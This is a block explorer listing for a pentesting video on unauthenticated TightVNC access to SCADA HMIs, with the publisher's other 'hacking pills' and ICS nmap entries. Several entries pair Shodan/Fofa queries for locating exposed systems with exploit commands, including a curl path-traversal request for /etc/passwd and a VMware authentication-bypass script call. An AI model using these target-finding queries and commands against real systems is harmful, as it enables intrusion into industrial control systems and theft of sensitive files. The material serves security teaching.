LBRY Block Explorer

LBRY Claims • hacking-pills-7-tightvnc-unauthenticated

9df1da58513e48041b75dfd463763cd2f52376cb

Published By
@r3dcl1ff
Created On
31 Dec 2023 14:28:38 UTC
Transaction ID
cbbaedcdd50ad74240a2c3f08c62d691414947af9ef42d808e7b2d9505c4120d
Cost
Safe for Work
Free
Yes
Hacking pills #7 : TightVNC Unauthenticated access
In this demo video, we'll explore a practical scenario where an unauthenticated VNC connection is exploited to gain access to a remote SCADA HMI .Use responsibly.

Shodan dork: "authentication disabled" port:5900,5901
Unauthenticated remote connection: vncviewer -passwd none 10.10.10.10

#ics #scada #pentesting #tightvnc
...
https://www.youtube.com/watch?v=mNpYS7DCfZ4
Author
Content Type
Unspecified
video/mp4
Language
English
Open in LBRY

More from the publisher

Controlling
VIDEO
ICS N
ics-nmap-8-dnp3-enumeration
lbry://@r3dcl1ff/ics-nmap-8-dnp3-enumeration
ICS NMAP #8 : DNP3 Enumeration DNP3 (Distributed Network Protocol version 3) is a widely used communications protocol in the field of industrial automation, particularly in the utility sector for supervisory control and data acquisition (SCADA) systems. However, it's important to note that DNP3 itself is not specific to PLCs but rather serves as a protocol for communication between various devices, including PLCs, RTUs (Remote Terminal Units), and SCADA systems. DNP3 provides robust and reliable communication over both serial and IP networks, with features like time synchronization, event reporting, and error detection. It's highly resilient to noisy and unreliable communication channels, making it suitable for use in challenging industrial environments. Additionally, DNP3 supports advanced security features such as authentication, encryption, and data integrity checks, ensuring the confidentiality and integrity of critical infrastructure systems. NMAP script : nmap --script dnp3-info -p 20000 10.10.10.10 #IoT #nmap #dnp3 #OT #pentesting ... https://www.youtube.com/watch?v=OStNMAUDP1c
Transaction
Created
1 month ago
Content Type
Language
video/mp4
English
Controlling
VIDEO
HACKI
hacking-pills-40-cve-2023-34039-vmware
lbry://@r3dcl1ff/hacking-pills-40-cve-2023-34039-vmware
CVE-2023-34039 ,Aria Operations for Networks contains an Authentication Bypass vulnerability due to a lack of unique cryptographic key generation. A malicious actor with network access to Aria Operations for Networks could bypass SSH authentication to gain access to the Aria Operations for Networks CLI. Fofa query: "VMWare Aria" Target Enum: nuclei -t CVE-2023-34039.yaml -u 10.10.10.10 Exploit: python3 exploit.py -t http://10.10.10.10. https://github.com/sinsinology/CVE-2023-34039 #cve-2023-34039 #auth_bypass #vmware ... https://www.youtube.com/watch?v=v5E_T5EkG3I
Transaction
Created
5 months ago
Content Type
Language
video/mp4
English
Controlling
VIDEO
HACKI
hacking-pills-31-cve-2023-2356-mlflow
lbry://@r3dcl1ff/hacking-pills-31-cve-2023-2356-mlflow
Mlflow prior to version 2.3.0 is prone to a Relative Path Traversal which allows remote attackers to access sensitive files including /etc/passwd. Fofa query : "app=MLflow" Target enum: nuclei -t CVE-2023-2356.yaml -u 10.10.10.10 Exploit : curl --insecure "https://10.10.10.10/model-versions/get-artifact?path=etc/passwd&name=...&version=1" #cve #bugbountytips #lfi ... https://www.youtube.com/watch?v=ujHWKpsvbws
Transaction
Created
5 months ago
Content Type
Language
video/mp4
English
Controlling
VIDEO
ICS N
ics-nmap-1-omron-fins-enumeration
lbry://@r3dcl1ff/ics-nmap-1-omron-fins-enumeration
ICS NMAP #1 : OMRON FINS Enumeration The Omron protocol is a communication standard used to exchange data between Omron programmable logic controllers (PLCs) and other devices. PLCs are industrial computers used to automate processes in manufacturing, controlling machinery and equipment. Omron PLCs utilize various programming languages and communication protocols to interact with sensors, actuators, and other devices in industrial settings. The Omron protocol facilitates reliable and efficient data exchange, enabling seamless integration and control of automation systems. NMAP script : nmap --script omron-info -sU -p 9600 10.10.10.10 #IoT #nmap #omron #pentesting ... https://www.youtube.com/watch?v=E9EZCwh3xpU
Transaction
Created
1 month ago
Content Type
Language
video/mp4
English
Controlling
VIDEO
HACKI
hacking-pills-54-microsoft-iis-offensive
lbry://@r3dcl1ff/hacking-pills-54-microsoft-iis-offensive
Shortscan is designed to quickly determine which files with short filenames exist on an IIS webserver. Once a short filename has been identified the tool will try to automatically identify the full filename. All credit goes to the original creator , github repo available in the video. Use responsibly. Fofa query:server="Microsoft-IIS" Exploit: shortscan target-ip -F #IIS #shortscan #enumeration ... https://www.youtube.com/watch?v=Bd_POCmv3Fs
Transaction
Created
3 months ago
Content Type
Language
video/mp4
English
Controlling
VIDEO
HACKI
hacking-pills-44-ruijie-rg-ew1200g
lbry://@r3dcl1ff/hacking-pills-44-ruijie-rg-ew1200g
A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown code block of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation with an unknown input leads to a access control vulnerability. The CWE definition for the vulnerability is CWE-284. The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. Fofa Query : body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" Target Enum: nuclei -t CVE-2023-4169.yaml -u 10.10.10.10 Exploit : https://github.com/thedarknessdied/CVE-2023-4169_CVE-2023-3306_CVE-2023-4415 #IoT_hacking #ruijie #auth_bypass ... https://www.youtube.com/watch?v=BD2FHb1CjEM
Transaction
Created
2 weeks ago
Content Type
Language
video/mp4
English
Controlling
VIDEO
PIMP
pimp-my-kali-2-tooling-up
lbry://@r3dcl1ff/pimp-my-kali-2-tooling-up
In this second video we install a number of commonly used tools for enumeration and password cracking. #kalilinuxtools #pentesting davidtancredi.gitbook.io/pentesting-notes/ github.com/r3dcl1ff linkedin.com/in/davidtancredi1337 ... https://www.youtube.com/watch?v=rL0prT9EicE
Transaction
Created
5 months ago
Content Type
Language
video/mp4
English
Controlling
VIDEO
ICS N
ics-nmap-2-bacnet-enumeration
lbry://@r3dcl1ff/ics-nmap-2-bacnet-enumeration
ICS NMAP #2 : BACNet Enumeration BACnet (Building Automation and Control Networks) protocol is a standard communication protocol used in building automation and control systems (BACS). It enables interoperability between various devices such as HVAC systems, lighting controls, and security systems, allowing them to exchange data seamlessly. BACnet facilitates monitoring, control, and management of building systems, promoting energy efficiency and operational optimization. It employs a client-server architecture, with devices communicating through a network, typically over Ethernet or RS-485. BACnet supports various data types and services, ensuring compatibility and flexibility in diverse building automation applications. NMAP script : nmap --script bacnet-info -sU -p 47808 10.10.10.10 #IoT #nmap #bacnet #pentesting ... https://www.youtube.com/watch?v=v4AaAWsorTM
Transaction
Created
1 month ago
Content Type
Language
video/mp4
English
Controlling
VIDEO
HACKI
hacking-pills-23-odoo-unauthenticated
lbry://@r3dcl1ff/hacking-pills-23-odoo-unauthenticated
Odoo is an open-source, all-in-one business management software suite. It offers a wide range of integrated applications for various business needs, including CRM, sales, inventory, accounting, and more. Thousands of odoo installations are misconfigured to allow unauthenticated access to the underlying database. shodan-query: title:"Odoo" Target enum: nuclei -t odoo-unprotected-database.yaml -u 10.10.10.10 #odoo #cve #bug_bounty #bugbountytips ... https://www.youtube.com/watch?v=L0LC4qlmtjA
Transaction
Created
5 months ago
Content Type
Language
video/mp4
English